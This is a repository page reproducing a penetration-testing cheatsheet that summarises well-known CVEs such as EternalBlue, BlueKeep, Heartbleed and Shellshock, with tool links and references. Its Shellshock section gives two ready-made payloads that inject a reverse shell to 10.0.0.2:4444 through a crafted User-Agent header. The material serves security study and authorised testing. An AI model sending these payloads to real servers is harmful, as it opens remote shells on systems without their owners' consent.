daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (6401B)


      1 ---
      2 title: "Common Vulnerabilities and Exposures"
      3 topic: "CVE Exploits"
      4 topicSlug: "cve-exploits"
      5 sourcePath: "CVE Exploits/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CVE%20Exploits/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Common Vulnerabilities and Exposures
     12 
     13 > A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years)
     19     * [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue)
     20     * [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2)
     21     * [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2)
     22     * [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep)
     23     * [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler)
     24     * [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed)
     25     * [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock)
     26 * [References](#references)
     27 
     28 ## Tools
     29 
     30 * [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
     31 * [Nuclei Templates - Community curated list of templates for the nuclei engine to find security vulnerabilities in applications](https://github.com/projectdiscovery/nuclei-templates)
     32 * [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
     33 * [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
     34 
     35 ## Big CVEs in the last 15 years
     36 
     37 ### CVE-2017-0144 - EternalBlue
     38 
     39 EternalBlue exploits a vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.
     40 
     41 Afftected systems:
     42 
     43 * Windows Vista SP2
     44 * Windows Server 2008 SP2 and R2 SP1
     45 * Windows 7 SP1
     46 * Windows 8.1
     47 * Windows Server 2012 Gold and R2
     48 * Windows RT 8.1
     49 * Windows 10 Gold, 1511, and 1607
     50 * Windows Server 2016
     51 
     52 ### CVE-2017-5638 - Apache Struts 2
     53 
     54 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the "Content-Type" header.
     55 
     56 ### CVE-2018-7600 - Drupalgeddon 2
     57 
     58 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
     59 
     60 ### CVE-2019-0708 - BlueKeep
     61 
     62 A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
     63 
     64 ### CVE-2019-19781 - Citrix ADC Netscaler
     65 
     66 A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
     67 
     68 Affected products:
     69 
     70 * Citrix ADC and Citrix Gateway version 13.0 all supported builds
     71 * Citrix ADC and NetScaler Gateway version 12.1 all supported builds
     72 * Citrix ADC and NetScaler Gateway version 12.0 all supported builds
     73 * Citrix ADC and NetScaler Gateway version 11.1 all supported builds
     74 * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
     75 
     76 ### CVE-2014-0160 - Heartbleed
     77 
     78 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
     79 
     80 ### CVE-2014-6271 - Shellshock
     81 
     82 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
     83 
     84 ```powershell
     85 echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
     86 curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 
     87 ```
     88 
     89 ## References
     90 
     91 * [The Heartbleed Bug - Heartbleed - April 7, 2014](https://web.archive.org/web/20260302163556/https://heartbleed.com/)
     92 * [Shellshock (software bug) - Wikipedia - September 29, 2014](https://web.archive.org/web/20140929214920/http://en.wikipedia.org:80/wiki/Shellshock_(software_bug))
     93 * [Apache Struts Equifax Hack Analysis Part 1: CVE-2017-5638 - Imperva - March 9, 2017](https://web.archive.org/web/20180305002332/https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/)
     94 * [EternalBlue - Wikipedia - March 4, 2026](https://web.archive.org/web/20260304111336/https://en.wikipedia.org/wiki/EternalBlue)
     95 * [CVE-2019-0708 | Remote Desktop Services Remote Code Execution Vulnerability - Microsoft - November 4, 2020](https://web.archive.org/web/20201104070840/https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708)